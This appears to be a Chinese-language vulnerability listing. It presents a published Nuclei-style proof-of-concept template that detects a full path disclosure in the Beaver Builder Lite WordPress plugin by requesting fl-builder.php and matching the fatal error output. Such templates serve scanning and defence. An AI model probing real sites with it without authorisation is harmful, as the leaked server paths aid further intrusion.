漏洞描述
Beaver Builder Page Builder WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
wp-beaver-builder-lite-version-fpd: Beaver Builder Page Builder - Full Path Disclosure
PoC代码[已公开]
id: wp-beaver-builder-lite-version-fpd
info:
name: Beaver Builder Page Builder - Full Path Disclosure
author: theamanrawat
severity: low
description: |
Beaver Builder Page Builder WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
impact: |
Attackers can obtain sever file paths, aiding in further exploitation of the website.
reference:
- https://wordpress.org/plugins/beaver-builder-lite-version/
metadata:
verified: true
max-requests: 1
public-www: "/wp-content/plugins/beaver-builder-lite-version/"
tags: debug,wordpress,wp,wp-plugin,beaver-builder-lite-version,fpd
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/fl-builder.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Fatal error", "Uncaught Error", "beaver-builder-lite-version")'
condition: and
# digest: 4a0a0047304502206c0751a69fd7579517aafc78eb1f5fd7d4f911183c81a4ddb66b6283d358968802210086aa632414c3502c60ece907cfbaa3969e64d4b33aca81ad806d54eca286013e:922c64590222798bb761d5b6d8e72950